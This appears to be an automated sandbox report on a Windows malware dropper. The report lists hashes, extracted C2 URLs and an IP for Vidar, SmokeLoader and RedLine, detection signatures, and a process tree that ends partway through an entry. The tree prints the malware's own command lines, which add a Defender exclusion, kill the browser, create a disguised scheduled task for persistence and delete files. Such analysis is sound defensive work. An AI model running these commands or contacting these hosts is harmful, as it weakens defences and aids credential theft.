Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    602s
  • max time network
    611s
  • platform
    windows10_x64
  • resource
    win10-fr
  • submitted
    20-09-2021 04:42

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

199qwe

C2

185.215.113.104:18754

Extracted

Family

icedid

Campaign

3162718704

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

    suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

    suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/IcedID Request Cookie

    suricata: ET MALWARE Win32/IcedID Request Cookie

  • suricata: ET MALWARE Win32/Tnega Activity (GET)

    suricata: ET MALWARE Win32/Tnega Activity (GET)

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 50 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 54 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 19 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 41 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 23 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:2252
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2868
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3168
        • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:3684
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4312
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2868
            • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19262b9e49ad.exe
              Sun19262b9e49ad.exe
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4368
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                7⤵
                  PID:4188
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    8⤵
                    • Kills process with taskkill
                    PID:816
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
              5⤵
                PID:4252
                • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19eb40faaaa9.exe
                  Sun19eb40faaaa9.exe
                  6⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  PID:4516
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                5⤵
                  PID:4336
                  • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun195a1614ec24e6a.exe
                    Sun195a1614ec24e6a.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4704
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                  5⤵
                    PID:4384
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                    5⤵
                      PID:4296
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                      5⤵
                        PID:4268
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                        5⤵
                          PID:4224
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4192
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4156
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4136
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4112
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
                          5⤵
                            PID:2284
                    • C:\Users\Admin\AppData\Local\Temp\282A.exe
                      C:\Users\Admin\AppData\Local\Temp\282A.exe
                      2⤵
                      • Executes dropped EXE
                      PID:5060
                    • C:\Users\Admin\AppData\Local\Temp\5517.exe
                      C:\Users\Admin\AppData\Local\Temp\5517.exe
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1324
                      • C:\Users\Admin\AppData\Local\Temp\5517.exe
                        C:\Users\Admin\AppData\Local\Temp\5517.exe
                        3⤵
                        • Adds Run key to start application
                        PID:4816
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Local\37ee7f47-34cf-4fdf-a9ca-b9589a36b813" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                          4⤵
                          • Modifies file permissions
                          PID:4904
                        • C:\Users\Admin\AppData\Local\Temp\5517.exe
                          "C:\Users\Admin\AppData\Local\Temp\5517.exe" --Admin IsNotAutoStart IsNotTask
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Suspicious use of FindShellTrayWindow
                          PID:6052
                          • C:\Users\Admin\AppData\Local\Temp\5517.exe
                            "C:\Users\Admin\AppData\Local\Temp\5517.exe" --Admin IsNotAutoStart IsNotTask
                            5⤵
                              PID:7264
                              • C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe
                                "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe"
                                6⤵
                                • Suspicious use of SetThreadContext
                                PID:6896
                                • C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe
                                  "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe"
                                  7⤵
                                  • Loads dropped DLL
                                  • Checks processor information in registry
                                  PID:7872
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build2.exe" & del C:\ProgramData\*.dll & exit
                                    8⤵
                                      PID:4852
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /im build2.exe /f
                                        9⤵
                                        • Kills process with taskkill
                                        PID:8140
                                      • C:\Windows\SysWOW64\timeout.exe
                                        timeout /t 6
                                        9⤵
                                        • Delays execution with timeout.exe
                                        PID:8128
                                • C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe
                                  "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe"
                                  6⤵
                                  • Suspicious use of SetThreadContext
                                  PID:7408
                                  • C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe
                                    "C:\Users\Admin\AppData\Local\d889f3b5-5337-4974-b282-a04df5e9027a\build3.exe"
                                    7⤵
                                      PID:7940
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                        8⤵
                                        • Creates scheduled task(s)
                                        PID:7256
                          • C:\Users\Admin\AppData\Local\Temp\734F.exe
                            C:\Users\Admin\AppData\Local\Temp\734F.exe
                            2⤵
                              PID:6872
                            • C:\Users\Admin\AppData\Local\Temp\9658.exe
                              C:\Users\Admin\AppData\Local\Temp\9658.exe
                              2⤵
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              PID:5680
                            • C:\Users\Admin\AppData\Local\Temp\E6AC.exe
                              C:\Users\Admin\AppData\Local\Temp\E6AC.exe
                              2⤵
                                PID:7888
                              • C:\Users\Admin\AppData\Local\Temp\F850.exe
                                C:\Users\Admin\AppData\Local\Temp\F850.exe
                                2⤵
                                • Loads dropped DLL
                                PID:64
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F850.exe"
                                  3⤵
                                    PID:6444
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      4⤵
                                      • Delays execution with timeout.exe
                                      PID:6992
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                1⤵
                                  PID:2708
                                  • C:\Windows\system32\wbem\WMIADAP.EXE
                                    wmiadap.exe /F /T /R
                                    2⤵
                                      PID:7200
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                    1⤵
                                      PID:2700
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                      1⤵
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2608
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                        2⤵
                                        • Drops file in System32 directory
                                        • Checks processor information in registry
                                        • Modifies data under HKEY_USERS
                                        • Modifies registry class
                                        PID:5188
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                      1⤵
                                        PID:2460
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                        1⤵
                                          PID:2416
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                          1⤵
                                            PID:1908
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                            1⤵
                                              PID:1420
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                              1⤵
                                                PID:1296
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                1⤵
                                                  PID:1192
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                  1⤵
                                                    PID:1072
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                    1⤵
                                                    • Drops file in System32 directory
                                                    PID:696
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:4368
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        3⤵
                                                          PID:7892
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                            4⤵
                                                            • Blocklisted process makes network request
                                                            • Executes dropped EXE
                                                            • Creates scheduled task(s)
                                                            PID:6976
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:4080
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          3⤵
                                                            PID:5744
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:4796
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            3⤵
                                                              PID:4968
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:5308
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:6428
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:3196
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                3⤵
                                                                  PID:4540
                                                              • C:\Users\Admin\AppData\Roaming\efcvtew
                                                                C:\Users\Admin\AppData\Roaming\efcvtew
                                                                2⤵
                                                                • Checks SCSI registry key(s)
                                                                • Suspicious behavior: MapViewOfSection
                                                                PID:7076
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:5388
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:4104
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                1⤵
                                                                  PID:1012
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun19e4ade31b2a.exe
                                                                  Sun19e4ade31b2a.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:4428
                                                                  • C:\Users\Admin\AppData\Roaming\3293587.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3293587.scr" /S
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4200
                                                                  • C:\Users\Admin\AppData\Roaming\3529892.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3529892.scr" /S
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2536
                                                                    • C:\Users\Admin\AppData\Roaming\3529892.scr
                                                                      "C:\Users\Admin\AppData\Roaming\3529892.scr"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:5248
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2536 -s 924
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:5552
                                                                  • C:\Users\Admin\AppData\Roaming\3861655.scr
                                                                    "C:\Users\Admin\AppData\Roaming\3861655.scr" /S
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:2476
                                                                  • C:\Users\Admin\AppData\Roaming\7587421.scr
                                                                    "C:\Users\Admin\AppData\Roaming\7587421.scr" /S
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                    PID:5172
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1966fb31dd5a07.exe
                                                                  Sun1966fb31dd5a07.exe
                                                                  1⤵
                                                                  • Executes dropped EXE
                                                                  PID:4760
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-N3QMT.tmp\Sun1966fb31dd5a07.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-N3QMT.tmp\Sun1966fb31dd5a07.tmp" /SL5="$20192,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1966fb31dd5a07.exe"
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:4964
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RB78P.tmp\Ze2ro.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RB78P.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                                      3⤵
                                                                      • Drops file in Drivers directory
                                                                      • Executes dropped EXE
                                                                      • Adds Run key to start application
                                                                      • Drops file in Program Files directory
                                                                      PID:4572
                                                                      • C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe
                                                                        "C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe" /VERYSILENT
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:4672
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0PUT2.tmp\ultramediaburner.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0PUT2.tmp\ultramediaburner.tmp" /SL5="$20324,281924,62464,C:\Program Files\Windows Media Player\UZDTFHMPMF\ultramediaburner.exe" /VERYSILENT
                                                                          5⤵
                                                                          • Executes dropped EXE
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:1408
                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:2876
                                                                      • C:\Users\Admin\AppData\Local\Temp\71-3a7d4-5b4-6d4b5-c35ec495c0f9b\Qinaeloxela.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\71-3a7d4-5b4-6d4b5-c35ec495c0f9b\Qinaeloxela.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:4680
                                                                      • C:\Users\Admin\AppData\Local\Temp\5b-1f0d7-7b7-b3f96-a2732025cc83a\Jyhatyshyba.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\5b-1f0d7-7b7-b3f96-a2732025cc83a\Jyhatyshyba.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:5444
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe /eufive & exit
                                                                          5⤵
                                                                            PID:6896
                                                                            • C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\4xtxfexk.tiz\GcleanerEU.exe /eufive
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:5916
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe /qn CAMPAIGN="654" & exit
                                                                            5⤵
                                                                              PID:6996
                                                                              • C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe /qn CAMPAIGN="654"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Enumerates connected drives
                                                                                • Modifies system certificate store
                                                                                • Suspicious use of FindShellTrayWindow
                                                                                PID:5696
                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q2501q02.mg5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632114046 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                  7⤵
                                                                                    PID:3300
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe & exit
                                                                                5⤵
                                                                                  PID:7152
                                                                                  • C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\l0rrwge4.d4w\anyname.exe
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:6344
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe /mixfive & exit
                                                                                  5⤵
                                                                                    PID:6516
                                                                                    • C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\stl1l43g.fht\gcleaner.exe /mixfive
                                                                                      6⤵
                                                                                        PID:6976
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun1905815e51282417.exe
                                                                              Sun1905815e51282417.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              PID:4644
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun198361825f4.exe
                                                                              Sun198361825f4.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:4564
                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:2752
                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\tmpCDC_tmp.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5804
                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS06C75FF0\Sun191101c1aaa.exe
                                                                              Sun191101c1aaa.exe
                                                                              1⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of AdjustPrivilegeToken
